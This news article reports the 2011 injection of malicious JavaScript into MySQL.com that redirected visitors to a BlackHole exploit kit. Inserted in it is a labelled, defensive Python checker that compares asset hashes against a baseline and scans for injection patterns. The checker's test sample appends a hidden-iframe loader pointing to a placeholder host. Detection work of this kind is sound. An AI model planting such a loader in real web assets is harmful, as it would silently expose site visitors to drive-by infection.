Cyber-criminals injected JavaScript code to divert visitors from MySQL.com to a malicious site hosting BlackHole malware toolkit in a drive-by-download attack.
Unknown attackers compromised the main Website of open-source
database MySQL and served malware to unsuspecting visitors for a short
period of time on Sept. 26.
Attackers injected JavaScript code on MySQL.com, owned by
Oracle, to divert visitors to malicious Websites hosting the BlackHole exploit
kit, which automatically downloaded malware to the victimized computers,
according to Wayne Huang, founder, president and CEO of Armorize
Technologies. The company said the attack has been disabled and the site is
no longer serving up malware.
The main page of MySQL.com was compromised to force visitors
to load a JavaScript file, Huang wrote on the Armorize blog. The file created
an IFRAME that silently redirected the victim to a page at falosfax.in, hosted in
Florida, and from there to a .cx.cc domain hosted in Sweden. Once on that page,
the BlackHole kit hosted on the site exploited the user's Web browser and its
installed plug-ins to download malware. For this attack, the attackers modified a
JavaScript file used by the Omniture SiteCatalyst plug-in, which tracks Website
metrics.
"The visitor doesn't need to click or agree to
anything; simply visiting mysql.com with a vulnerable browsing platform will
result in an infection," Huang wrote.
BlackHole is a widely used kit that contains pre-loaded
exploits for vulnerabilities in Web browsers and in other Web components and
plug-ins, such as Flash Player, Adobe Reader and Java. It takes advantage of
unpatched software to compromise the machine. The drive-by-download attack is a
common technique and often relies on JavaScript to silently redirect users to
malicious sites without their knowing.
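The two passages above describe the mechanism: a trusted static script on the site was modified to emit a hidden IFRAME that pulled in an exploit kit page. The following is an added example, not code from the article or from Armorize, Trend Micro or Sucuri, of the kind of check a site operator can run over served JavaScript assets to catch that pattern: it compares each asset against a hash baseline and flags the usual markers of injected drive-by loaders (tiny or hidden iframes written from script, decode-and-eval wrappers). The asset path, the baseline content, the sample scripts and the redirect host are all constructed for the illustration.

```python
"""Integrity and injection check for a site's static JavaScript assets.

Added example: not code from the article or from Armorize, Trend Micro or
Sucuri. The asset path, baseline content, sample scripts and the redirect
host below are constructed for illustration.
"""
import hashlib
import re

# Constructed baseline: expected SHA-256 of each served asset (hypothetical path).
# In practice this comes from the deployed build, not from the live server.
BASELINE = {
    "/js/s_code.js": hashlib.sha256(b"var s = s_gi('prod');\n").hexdigest(),
}

# Markers typical of injected drive-by loaders: an iframe sized to be invisible,
# an iframe hidden via CSS, script that writes an iframe, or decode-then-eval.
INJECTION_PATTERNS = [
    re.compile(r"<iframe[^>]*(width|height)\s*=\s*['\"]?\s*[01]\b", re.I),
    re.compile(r"<iframe[^>]*visibility\s*:\s*hidden", re.I),
    re.compile(r"document\.write\s*\(\s*['\"]<iframe", re.I),
    re.compile(r"eval\s*\(\s*(unescape|atob|String\.fromCharCode)", re.I),
]


def sha256_of(content: bytes) -> str:
    """Hex SHA-256 of a served asset body."""
    return hashlib.sha256(content).hexdigest()


def check_asset(path: str, content: bytes) -> dict:
    """Return findings for one served asset: hash drift vs the baseline and
    which injection markers matched. An asset with no baseline entry is only
    checked for markers."""
    findings = {"path": path, "hash_changed": False, "hits": []}
    expected = BASELINE.get(path)
    if expected is not None and sha256_of(content) != expected:
        findings["hash_changed"] = True
    text = content.decode("utf-8", errors="replace")
    for pattern in INJECTION_PATTERNS:
        if pattern.search(text):
            findings["hits"].append(pattern.pattern)
    return findings


def is_suspicious(findings: dict) -> bool:
    """Either signal alone is enough to page someone: hash drift catches
    modifications the patterns miss, patterns catch assets with no baseline."""
    return findings["hash_changed"] or bool(findings["hits"])


# Constructed samples: the clean asset, and the same asset with a hidden-iframe
# loader appended to it (redirect.invalid is a placeholder, not a real host).
CLEAN = b"var s = s_gi('prod');\n"
TAMPERED = CLEAN + (
    b"document.write('<iframe src=\"http://redirect.invalid/x\" "
    b"width=\"1\" height=\"1\"></iframe>');\n"
)

if __name__ == "__main__":
    for label, body in (("clean", CLEAN), ("tampered", TAMPERED)):
        result = check_asset("/js/s_code.js", body)
        state = "SUSPICIOUS" if is_suspicious(result) else "ok"
        print(f"{label}: {state} hash_changed={result['hash_changed']} hits={len(result['hits'])}")
```

The hash comparison is the check that actually matters for a case like this one, since an attacker who holds FTP or root access can append code that matches no pattern at all; the markers are there to triage assets that were never baselined. Run it against what the live server returns, not against the files on disk, so that a modification made at the edge is still seen.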
Eight out of 44 major security vendors currently detect the
malware, according to malware tracker VirusTotal.
Trend Micro researchers found evidence that attackers were
selling root access to some of the cluster servers of mysql.com and its
subdomains on underground criminal forums. The seller was offering a shell
console window with root access to these servers for $3,000, Maxim Goncharov, a
senior threat researcher at Trend Micro, wrote on the Malware blog.
Cyber-criminals are "brazen" enough to sell administrative
access to specific systems, Goncharov wrote.
It appears that the site was initially compromised by JavaScript malware of a
kind that is often associated with stolen FTP passwords, according to
researchers at Sucuri Security. The malware likely compromised a computer
belonging to a member of the MySQL.com team and stole the password from the
FTP client, Sucuri researchers wrote on the blog.
MySQL is an open-source database that originally was owned
by an independent entity, but was purchased by Sun Microsystems in 2008. It later
became part of Oracle when that company bought Sun in 2009. Trend Micro's
Goncharov said the team contacted MySQL last week but hadn't received a
response. The site appeared to be serving up malware for about a three-hour
window in the middle of the day.
With root access available for sale, it is possible that the
malicious perpetrator who originally compromised mysql.com is not the one
responsible for the BlackHole attack that served up malware on the site.